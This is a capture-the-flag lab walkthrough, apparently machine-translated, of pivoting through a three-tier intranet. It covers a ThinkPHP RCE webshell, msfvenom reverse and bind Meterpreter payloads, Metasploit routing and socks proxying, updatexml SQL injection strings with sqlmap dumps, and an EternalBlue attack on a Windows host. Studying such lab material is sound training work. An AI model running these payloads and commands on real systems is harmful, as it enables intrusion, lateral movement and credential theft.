CFS layer 3 intranet roaming-2019 a CTF case

tips: after downloading the shooting range, you need to configure the network card, IP, etc. to ensure the three-tier Intranet environment

The shooting range penetrates the intranet layer by layer from the WEB level, mainly to learn ideas and lay a good foundation for future intranet penetration

The topology is as follows:

Excerpt from brother Di's hhh

Penetration test


Probe target - exploit WEB vulnerability (TP5_RCE) - get webshell permission - get Flag-Target2

Information collection:

Use nmap to scan ports

(I don't configure the IP in the topology here, so I can configure the IP by myself.)

nmap -sV -p 1-65535 -T4

If you are prompted that the site is not built, you need to configure it in the background of the pagoda. The environment building tutorials are

Access the scanned port 80, (public directory)

target1(thinkphp5 build)

Go directly to exp or tools (convenient and fast / mind you can manually)

The payload is automatically generated, and the back door connection address is very intimate. The password is also given

Just connect the ant sword and successfully obtain the shell+flag

Or use EXP published online

It's also very considerate. payload, the database also comes out, and it's convenient to generate files with one click

Intranet horizontal

Go directly to MSF,

1. Generate MSF backdoor (IP, port changes by itself)

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=your:ip LPORT=1111 -f elf >t1.elf

2. Set monitoring

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST your:ip
set LPORT 1111

Upload the generated Trojan horse with ant sword and execute it. If the permission is not enough, chmod+x can be used

After execution, you can see that the shell has bounced back and continue the subsequent penetration

Intranet agent

Information collection and configuration access

Get network interface: run get_local_subnets
 View routing address: run autoroute -p
 Add routing address: run autoroute -s

Get network interface: get three network segments

Check the routing address: not added yet

Add 22 network segment routing address:

After adding, you can see the routing address. After adding, you can use MSFping to connect to the 22 network segment (only based on the MSF session can communicate)

The route has been added, but only the returned shell can access the intranet target in segment 22;

tips: only based on the shell received by MSF, you can access tong22 network segment. Please understand by yourself

The current session is session1, which is built on the shell of Target1. After the route is established, it can communicate with network segment 22. So we want to use tools to attack the 22 network segment through session1. What should we do at this time?

(in order to solve this situation, we can open an agent locally (there is a module on msf that can open an agent). Through this agent, we can give others a port to connect, and then we can use our own machine (our own computer, not the attacker kali) to connect to kali's port, so that we can access

You can use sock4+proxychains4 agent to get through the intranet

background   Save what you got shell Session, hidden to background
use auxiliary/server/socks_proxy
set SRVPORT 1080

Under linux system, the local proxy interface can be used for access

tips: the configuration file must be modified, otherwise it cannot be received

vim /etc/proxychains4.conf   

Modify the configuration information at the end of the file

It is impossible to scan the network segment with nmap directly in kali. It will show that it is not found

You need to add the newly configured agent file to scan

proxychains4 nmap -Pn -sT
proxychains4 nmap -Pn -sT

Under windows, you can install a SocksCap64 or Proxifier to set the agent

Just add the tools you want to use

If the browser wants to access the 22 network segment, it is also very simple. Just configure the network

Successful access to 22 network segment, another wave of information collection

After port scanning, check port 80 and find myna CMS

Run a wave of background targets. I use dirb/dirsearc


Discover robots directory

Find similar background, visit and try

After successfully accessing the background and trying to explode without success, check the source code of the website and find the SQL injection point

Manual error injection

index.php?r=vul&keyword=1 ' and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='bagecms'),1,32),0x7e),1)--+

Table name:

index.php?r=vul&keyword=1'and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema="bagecms")),0x7e)) --+

Finally, the data burst:

md5 decrypts and obtains the background account password admin 123qwe

Login background http://url/index.php?r=admini/default/index

Or SQLmap runs a wave

proxychains4 sqlmap -u "" -p keyword –dbs
proxychains4 sqlmap -u "" -p keyword -D bagecms –tables
proxychains4 sqlmap -u "" -p keyword -D bagecms -T bage_admin –columns
proxychains4 sqlmap -u "" -p keyword -D bagecms -T bage_admin -C username,password –dump

Log in to the background and take down the flag

Content template found, try to write to shell


Use AntSword to set the proxy connection shell, and ant sword has its own proxy function

After getting the shell

Continue to pass the horse to get the shell at msf, but the target is in the network segment. We can't connect it actively, so we need to connect it forward here, and msf can connect it

Generate forward backdoor

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > 3.elf

msf forward connection

use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost
set LPORT 3333

It is still the old step, information collection + configuration access

Get network interface: run get_local_subnets
 Add routing address: run autoroute -s
 View routing address: run autoroute -p



Continue to scan 33 network segments with proxy

proxychains4 nmap -Pn -sT

I found that this is a Windows system with ports 445 and 3389 open. Try using eternal blue

use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp

After you get the session, you can execute the system command casually. Here the shell is garbled. You can enter chcp 65001 to modify the code, which is good

net user

Search flag

cd /
dir /S *flag* /B
type C:\Windows\System32\config\flag.txt
# /B displays the name of the folder or file
# /S displays the files in the specified directory and all subdirectories.
# dir /S /B *flag*

Finally, you can check the type

So far, three flag s have been successfully won


1, It may be that the environment is not configured well, which leads to the fact that my local machine and kali can connect to three target machines. emmmm has not found the reason, and the network card is not working. I don't understand why it can work (pretend that he doesn't work hhhhhh)

2, target2 didn't fully understand the meaning of forward agency when playing target3

3, Summarize the attack process, find the 80 port open ThinkPHP through the IP information collection port, use EXP to successfully get the shell of Target1, use MSF to generate a horse and upload it to the host of Target1 for execution, kali to listen, start collecting information after receiving the session, and add the route of 22 network segments. linux uses its own proxy tool proxychains4 for proxy communication, and other tools can be used to scan 22 network segments, You can also use the windows tool proxifier/sockscap to scan the 22 network segments. You can scan the IP of the 22 network segments through the proxy tool and find the open port 80. You can visit the myna CMS. You can scan the directory and find the background path in the robots directory. The attempt to blast failed. You can audit the web source code and find that the injection point is indicated. SQLmap or manually run a wave of background account passwords to log in. The background interface finds that the template function point can be written to the shell, Use the ant sword to connect, successfully win the shell of target2, use target2 as a springboard to attack target3, and use the forward proxy to generate a horse. (my general understanding is that the shell session of target2 obtained through MSF continues to play target3,) generate a forward and backward door, and use MSF to connect forward, (personal understanding: it is equivalent to that we have obtained the shell of target2, and the horse is generated through the shell session of target2 to attack target3, because the session of 2 has established a route, and MSF can access 33 network segments). Information collection information of tatget3 is found to open port 445/3389, and try to use ms17010 for direct attack (or attack based on the shell session of target2). The shell is successfully obtained through ms17010, which is over

4, Don't just limit yourself to msf. Indeed, we have to learn how to use other tools later, such as CS, ladon and other common tools in the market

5, The main thing is to learn an idea to lay a good foundation for future intranet penetration. Some of them still have no idea. emmmm feels that the difficulty of Intranet is much higher than that of WEB

Tags: Cyber Security security network Intranet Penetration

Posted by rahish on Sun, 07 Aug 2022 21:54:33 +0530